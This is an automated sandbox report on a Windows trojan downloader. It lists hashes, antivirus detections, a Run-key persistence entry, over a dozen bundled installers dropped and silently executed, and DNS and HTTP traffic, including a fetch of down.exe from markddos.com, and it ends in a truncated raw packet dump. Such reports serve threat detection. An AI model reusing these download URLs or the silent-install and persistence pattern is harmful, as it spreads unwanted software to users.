Analysis Date | 2015-04-09 12:30:14 |
---|---|
MD5 | 188a26a038431c5c5d12690e89112639 |
SHA1 | d4c3b0d14be879e6ec89c142d058ca3f84e152e7 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: c1e0625655fec2c794ad156122efaeb6 sha1: 3678539b205969495151a40085f98e5b9ba40dca size: 425984 | |
Section | .rdata md5: 84757542d53dd972b169ed4a1c726f59 sha1: 1b354d4274dfcc9fd968c2eb56f991f68c2efef0 size: 73728 | |
Section | .data md5: 44df68437fe47b536e9db4c156451107 sha1: ec39b3b9f403b81ef643a0147ded306fb9e1ec2e size: 61440 | |
Section | .rsrc md5: b8c2a05a605bdf24eba896ec92c05919 sha1: 54cdb202d623745cac24a169f60bf93a4caf16f1 size: 24576 | |
Timestamp | 2015-04-01 04:05:02 | |
Version | LegalCopyright: 作者版权所有 请尊重并使用正版 FileVersion: 1.0.0.0 Comments: 本程序使用易语言编写(http://www.eyuyan.com) ProductName: 易语言程序 ProductVersion: 1.0.0.0 FileDescription: 易语言程序 | |
Packer | Microsoft Visual C++ v6.0 | |
PEhash | 92364683295be49d51ca27559afa0b36155e08cf | |
IMPhash | 95399cf8f12a4df9c830293f94dcef7f | |
AV | 360 Safe | no_virus |
AV | Ad-Aware | Gen:Variant.Graftor.98607 |
AV | Alwil (avast) | Evo-gen [Susp] |
AV | Arcabit (arcavir) | Gen:Variant.Graftor.98607 |
AV | Authentium | W32/Agent.EW.gen!Eldorado |
AV | Avira (antivir) | TR/Agent.589824.519 |
AV | BullGuard | Gen:Variant.Graftor.98607 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | no_virus |
AV | ClamAV | no_virus |
AV | Dr. Web | Trojan.DownLoader12.54665 |
AV | Emsisoft | Gen:Variant.Graftor.98607 |
AV | Eset (nod32) | no_virus |
AV | Fortinet | W32/Generic!tr |
AV | Frisk (f-prot) | W32/Agent.EW.gen!Eldorado |
AV | F-Secure | Trojan:W32/DelfInject.R |
AV | Grisoft (avg) | Win32/DH{IEEPIiVXZ04} |
AV | Ikarus | no_virus |
AV | K7 | no_virus |
AV | Kaspersky 2015 | Trojan.Win32.Generic |
AV | MalwareBytes | Spyware.OnlineGames |
AV | Mcafee | Pasta |
AV | Microsoft Security Essentials | no_virus |
AV | MicroWorld (escan) | Gen:Variant.Graftor.98607 |
AV | Rising | no_virus |
AV | Sophos | no_virus |
AV | Symantec | no_virus |
AV | Trend Micro | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run\sbds ➝ malware.exe\C:\\x00 |
---|---|
Creates File | C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe |
Creates File | C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Windows\boos.exe |
Creates File | C:\haozip_silent_782130248.exe |
Creates File | C:\pic_silent_782130248.exe |
Creates File | C:\WINDOWS\system32\2345haozip_k87648162.exe |
Creates File | C:\kuwo_silent_782130248.exe |
Creates File | C:\bdpinyin_silent_782130248.exe |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | C:\bdBrowserSetup-5956-ftn_1000151945.exe |
Creates File | C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe |
Creates File | C:\pps_silent_782130248.exe |
Creates File | C:\qqpcmgr_silent_782130248.exe |
Creates File | C:\PPTV_forqd3036_02134.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\2345explorer_k87648162.exe |
Creates File | C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe |
Creates File | C:\2345pcsafe_k87648162.exe |
Creates File | C:\dscKAVSETUPS_66_130903.exe |
Creates File | C:\lkfish_k87648162_332947.exe |
Creates File | C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe |
Creates Process | C:\bdpinyin_silent_782130248.exe |
Creates Process | C:\2345pcsafe_k87648162.exe |
Creates Process | C:\pps_silent_782130248.exe |
Creates Process | C:\pic_silent_782130248.exe |
Creates Process | C:\2345haozip_k87648162.exe |
Creates Process | C:\Windows\boos.exe |
Creates Process | C:\kuwo_silent_782130248.exe |
Creates Process | C:\qqpcmgr_silent_782130248.exe |
Creates Process | C:\bdBrowserSetup-5956-ftn_1000151945.exe |
Creates Process | C:\lkfish_k87648162_332947.exe |
Creates Process | C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe |
Creates Process | C:\haozip_silent_782130248.exe |
Creates Process | C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe |
Creates Process | C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe |
Creates Process | C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe |
Creates Process | C:\PPTV_forqd3036_02134.exe |
Creates Process | C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe |
Creates Process | C:\dscKAVSETUPS_66_130903.exe |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Process
↳ C:\2345haozip_k87648162.exe
Process
↳ C:\2345pcsafe_k87648162.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs2.tmp |
Creates File | C:\2345PC~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1.tmp |
Deletes File | C:\WINDOWS\TEMP\scs2.tmp |
Process
↳ C:\lkfish_k87648162_332947.exe
Creates File | C:\LKFISH~1.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
Creates File | C:\WINDOWS\TEMP\scs4.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs3.tmp |
Deletes File | C:\WINDOWS\TEMP\scs4.tmp |
Deletes File | C:\WINDOWS\TEMP\scs3.tmp |
Process
↳ C:\dscKAVSETUPS_66_130903.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs5.tmp |
Creates File | C:\DSCKAV~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs6.tmp |
Deletes File | C:\WINDOWS\TEMP\scs5.tmp |
Deletes File | C:\WINDOWS\TEMP\scs6.tmp |
Process
↳ C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs7.tmp |
Creates File | C:\WINDOWS\TEMP\scs8.tmp |
Creates File | C:\BAIDUA~1.EXE |
Deletes File | C:\WINDOWS\TEMP\scs8.tmp |
Deletes File | C:\WINDOWS\TEMP\scs7.tmp |
Process
↳ C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\BAIDUS~1.EXE |
Creates File | C:\WINDOWS\TEMP\scsA.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs9.tmp |
Deletes File | C:\WINDOWS\TEMP\scsA.tmp |
Deletes File | C:\WINDOWS\TEMP\scs9.tmp |
Process
↳ C:\bdBrowserSetup-5956-ftn_1000151945.exe
Creates File | C:\BDBROW~1.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
Creates File | C:\WINDOWS\TEMP\scsC.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scsB.tmp |
Deletes File | C:\WINDOWS\TEMP\scsC.tmp |
Deletes File | C:\WINDOWS\TEMP\scsB.tmp |
Process
↳ C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\BAIDUP~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scsD.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scsE.tmp |
Deletes File | C:\WINDOWS\TEMP\scsD.tmp |
Deletes File | C:\WINDOWS\TEMP\scsE.tmp |
Process
↳ C:\qqpcmgr_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scsF.tmp |
Creates File | C:\QQPCMG~1.EXE |
Creates File | C:\WINDOWS\TEMP\scs10.tmp |
Deletes File | C:\WINDOWS\TEMP\scsF.tmp |
Deletes File | C:\WINDOWS\TEMP\scs10.tmp |
Process
↳ C:\bdpinyin_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\BDPINY~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs12.tmp |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs11.tmp |
Deletes File | C:\WINDOWS\TEMP\scs12.tmp |
Deletes File | C:\WINDOWS\TEMP\scs11.tmp |
Process
↳ C:\pps_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\PPS_SI~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs14.tmp |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs13.tmp |
Deletes File | C:\WINDOWS\TEMP\scs13.tmp |
Deletes File | C:\WINDOWS\TEMP\scs14.tmp |
Process
↳ C:\haozip_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\TEMP\scs16.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\HAOZIP~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\TEMP\scs15.tmp |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Deletes File | C:\WINDOWS\TEMP\scs16.tmp |
Deletes File | C:\WINDOWS\TEMP\scs15.tmp |
Process
↳ C:\pic_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs17.tmp |
Creates File | C:\WINDOWS\TEMP\scs18.tmp |
Creates File | C:\PIC_SI~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Deletes File | C:\WINDOWS\TEMP\scs17.tmp |
Deletes File | C:\WINDOWS\TEMP\scs18.tmp |
Process
↳ C:\kuwo_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1A.tmp |
Creates File | C:\KUWO_S~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs19.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Deletes File | C:\WINDOWS\TEMP\scs1A.tmp |
Deletes File | C:\WINDOWS\TEMP\scs19.tmp |
Process
↳ C:\PPTV_forqd3036_02134.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs1C.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\PPTV_F~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1B.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1C.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1B.tmp |
Process
↳ C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs1D.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs1E.tmp |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\BDSBAO~1.EXE |
Deletes File | C:\WINDOWS\TEMP\scs1D.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1E.tmp |
Process
↳ C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1F.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\7654~1.EXE |
Creates File | C:\WINDOWS\TEMP\scs20.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Deletes File | C:\WINDOWS\TEMP\scs1F.tmp |
Deletes File | C:\WINDOWS\TEMP\scs20.tmp |
Process
↳ C:\Windows\boos.exe
Network Details:
DNS | download.2345.com Type: A 61.160.245.14 |
---|---|
DNS | download.2345.com Type: A 122.228.248.3 |
DNS | download.2345.com Type: A 218.75.155.244 |
DNS | download.2345.com Type: A 60.191.187.15 |
DNS | download.2345.com Type: A 60.191.223.2 |
DNS | download.2345.com Type: A 60.191.223.4 |
DNS | download.2345.com Type: A 60.191.223.15 |
DNS | download.2345.com Type: A 61.147.127.202 |
DNS | download.2345.com Type: A 61.147.127.203 |
DNS | download.2345.com Type: A 61.160.245.8 |
DNS | download.2345.com Type: A 61.160.245.11 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.11 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.13 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.14 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.9 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.10 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.11 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.12 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.9 |
DNS | brdlsw.jomodns.com Type: A 124.238.238.46 |
DNS | download.58611.net Type: A 218.241.29.215 |
DNS | cache.bfcdn.net Type: A 122.72.76.199 |
DNS | pcsnb2.jomodns.com Type: A 115.231.42.46 |
DNS | www.markddos.com Type: A 198.211.24.230 |
DNS | jifendownload.2345.cn Type: A |
DNS | d.union.ijinshan.com Type: A |
DNS | dlsw.br.baidu.com Type: A |
DNS | u.dl.baofeng.com Type: A |
DNS | nb.cache.baidupcs.com Type: A |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/2345explorer_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/2345pcsafe_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/lkfish_k87648162_332947.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/2345haozip_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://d.union.ijinshan.com/duba/link/dscKAVSETUPS_66_130903.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/bdBrowserSetup-5956-ftn_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pinyin/bdpinyin_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pps/pps_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/haozip_silent/haozip_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pic/pic_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/kuwo_silent/kuwo_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_02134.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://u.dl.baofeng.com/upload/bdsBaofeng5%5B%5B1671_02134%5D%5D.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://nb.cache.baidupcs.com/file/e15788e5a4a5bc4ccbd8acfccccddd3b?bkt=p2-qd-294&xcode=57d758161f66de706ccd294c1df1f083ad23dfac9bf6b2990b2977702d3e6764&fid=1801360174-250528-100554078920541&time=1427860893&sign=FDTAXERLBH-DCb740ccc5511e5e8fedcff06b081203-FFbapq2m6pKvQgf68PPDkIbWRiQ%3D&to=nbc&fm=Nan,B,M,ny&sta_dx=2&sta_cs=1&sta_ft=exe&sta_ct=0&newver=1&newfm=1&flow_ver=3&sl=80347212&expires=8h&rt=sh&r=417997622&mlogid=3844192640&vuk=137491712&vbdid=3540108374&fin=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe&fn=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://www.markddos.com:8555/down.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
Flows TCP | 192.168.1.1:1031 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1032 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1033 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1034 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1035 ➝ 8.37.235.11:80 |
Flows TCP | 192.168.1.1:1036 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1037 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1038 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1039 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1040 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1041 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1042 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1043 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1044 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1045 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1046 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1047 ➝ 122.72.76.199:80 |
Flows TCP | 192.168.1.1:1048 ➝ 115.231.42.46:80 |
Flows TCP | 192.168.1.1:1049 ➝ 198.211.24.230:8555 |
Raw Pcap
0x00000000 (00000) 47455420 2f6a6966 656e5f32 3334352f GET /jifen_2345/ 0x00000010 (00016) 32333435 6578706c 6f726572 5f6b3837 2345explorer_k87 0x00000020 (00032) 36343831 36322e65 78652048 5454502f 648162.exe HTTP/ 0x00000030 (00048) 312e310d 0a557365 722d4167 656e743a 1.1..User-Agent: 0x00000040 (00064) 204d6f7a 696c6c61 2f342e30 2028636f Mozilla/4.0 (co 0x00000050 (00080) 6d706174 69626c65 3b204d53 49452036 mpatible; MSIE 6 0x00000060 (00096) 2e303b20 57696e64 6f777320 4e542035 .0; Windows NT 5 0x00000070 (00112) 2e30290d 0a416363 6570743a 202a2f2a .0)..Accept: */* 0x00000080 (00128) 0d0a486f 73743a20 6a696665 6e646f77 ..Host: jifendow 0x00000090 (00144) 6e6c6f61 642e3233 34352e63 6e0d0a43 nload.2345.cn..C 0x000000a0 (00160) 61636865 2d436f6e 74726f6c 3a206e6f ache-Control: no 0x000000b0 (00176) 2d636163 68650d0a 0d0a -cache.... 0x00000000 (00000) 47455420 2f6a6966 656e5f32 3334352f GET /jifen_2345/ 0x00000010 (00016) 32333435 70637361 66655f6b 38373634 2345pcsafe_k8764 0x00000020 (00032) 38313632 2e657865 20485454 502f312e 8162.exe HTTP/1. 0x00000030 (00048) 310d0a55 7365722d 4167656e 743a204d 1..User-Agent: M 0x00000040 (00064) 6f7a696c 6c612f34 2e302028 636f6d70 ozilla/4.0 (comp 0x00000050 (00080) 61746962 6c653b20 4d534945 20362e30 atible; MSIE 6.0 0x00000060 (00096) 3b205769 6e646f77 73204e54 20352e30 ; Windows NT 5.0 0x00000070 (00112) 290d0a41 63636570 743a202a 2f2a0d0a )..Accept: */*.. 0x00000080 (00128) 486f7374 3a206a69 66656e64 6f776e6c Host: jifendownl 0x00000090 (00144) 6f61642e 32333435 2e636e0d 0a436163 oad.2345.cn..Cac 0x000000a0 (00160) 68652d43 6f6e7472 6f6c3a20 6e6f2d63 he-Control: no-c 0x000000b0 (00176) 61636865 0d0a0d0a 0d0a ache...... 0x00000000 (00000) 47455420 2f6a6966 656e5f32 3334352f GET /jifen_2345/ 0x00000010 (00016) 6c6b6669 73685f6b 38373634 38313632 lkfish_k87648162 0x00000020 (00032) 5f333332 3934372e 65786520 48545450 _332947.exe HTTP 0x00000030 (00048) 2f312e31 0d0a5573 65722d41 67656e74 /1.1..User-Agent 0x00000040 (00064) 3a204d6f 7a696c6c 612f342e 30202863 : Mozilla/4.0 (c 0x00000050 (00080) 6f6d7061 7469626c 653b204d 53494520 ompatible; MSIE 0x00000060 (00096) 362e303b 2057696e 646f7773 204e5420 6.0; Windows NT 0x00000070 (00112) 352e3029 0d0a4163 63657074 3a202a2f 5.0)..Accept: */ 0x00000080 (00128) 2a0d0a48 6f73743a 206a6966 656e646f *..Host: jifendo 0x00000090 (00144) 776e6c6f 61642e32 3334352e 636e0d0a wnload.2345.cn.. 0x000000a0 (00160) 43616368 652d436f 6e74726f 6c3a206e Cache-Control: n 0x000000b0 (00176) 6f2d6361 6368650d 0a0d0a o-cache.... 0x00000000 (00000) 47455420 2f6a6966 656e5f32 3334352f GET /jifen_2345/ 0x00000010 (00016) 32333435 68616f7a 69705f6b 38373634 2345haozip_k8764 0x00000020 (00032) 38313632 2e657865 20485454 502f312e 8162.exe HTTP/1. 0x00000030 (00048) 310d0a55 7365722d 4167656e 743a204d 1..User-Agent: M 0x00000040 (00064) 6f7a696c 6c612f34 2e302028 636f6d70 ozilla/4.0 (comp 0x00000050 (00080) 61746962 6c653b20 4d534945 20362e30 atible; MSIE 6.0 0x00000060 (00096) 3b205769 6e646f77 73204e54 20352e30 ; Windows NT 5.0 0x00000070 (00112) 290d0a41 63636570 743a202a 2f2a0d0a )..Accept: */*.. 0x00000080 (00128) 486f7374 3a206a69 66656e64 6f776e6c Host: jifendownl 0x00000090 (00144) 6f61642e 32333435 2e636e0d 0a436163 oad.2345.cn..Cac 0x000000a0 (00160) 68652d43 6f6e7472 6f6c3a20 6e6f2d63 he-Control: no-c 0x000000b0 (00176) 61636865 0d0a0d0a 0a0d0a ache....... 0x00000000 (00000) 47455420 2f647562 612f6c69 6e6b2f64 GET /duba/link/d 0x00000010 (00016) 73634b41 56534554 5550535f 36365f31 scKAVSETUPS_66_1 0x00000020 (00032) 33303930 332e6578 65204854 54502f31 30903.exe HTTP/1 0x00000030 (00048) 2e310d0a 55736572 2d416765 6e743a20 .1..User-Agent: 0x00000040 (00064) 4d6f7a69 6c6c612f 342e3020 28636f6d Mozilla/4.0 (com 0x00000050 (00080) 70617469 626c653b 204d5349 4520362e patible; MSIE 6. 0x00000060 (00096) 303b2057 696e646f 7773204e 5420352e 0; Windows NT 5. 0x00000070 (00112) 30290d0a 41636365 70743a20 2a2f2a0d 0)..Accept: */*. 0x00000080 (00128) 0a486f73 743a2064 2e756e69 6f6e2e69 .Host: d.union.i 0x00000090 (00144) 6a696e73 68616e2e 636f6d0d 0a436163 jinshan.com..Cac 0x000000a0 (00160) 68652d43 6f6e7472 6f6c3a20 6e6f2d63 he-Control: no-c 0x000000b0 (00176) 61636865 0d0a0d0a 0a0d0a ache....... 0x00000000 (00000) 47455420 2f646974 75692f7a 756a6961 GET /ditui/zujia 0x00000010 (00016) 6e2f4261 69647541 6e2e5365 7475702e n/BaiduAn.Setup. 0x00000020 (00032) 31313137 2e342e30 2e302e35 31365f31 1117.4.0.0.516_1 0x00000030 (00048) 30303031 35313934 352e6578 65204854 000151945.exe HT 0x00000040 (00064) 54502f31 2e310d0a 55736572 2d416765 TP/1.1..User-Age 0x00000050 (00080) 6e743a20 4d6f7a69 6c6c612f 342e3020 nt: Mozilla/4.0 0x00000060 (00096) 28636f6d 70617469 626c653b 204d5349 (compatible; MSI 0x00000070 (00112) 4520362e 303b2057 696e646f 7773204e E 6.0; Windows N 0x00000080 (00128) 5420352e 30290d0a 41636365 70743a20 T 5.0)..Accept: 0x00000090 (00144) 2a2f2a0d 0a486f73 743a2064 6c73772e */*..Host: dlsw. 0x000000a0 (00160) 62722e62 61696475 2e636f6d 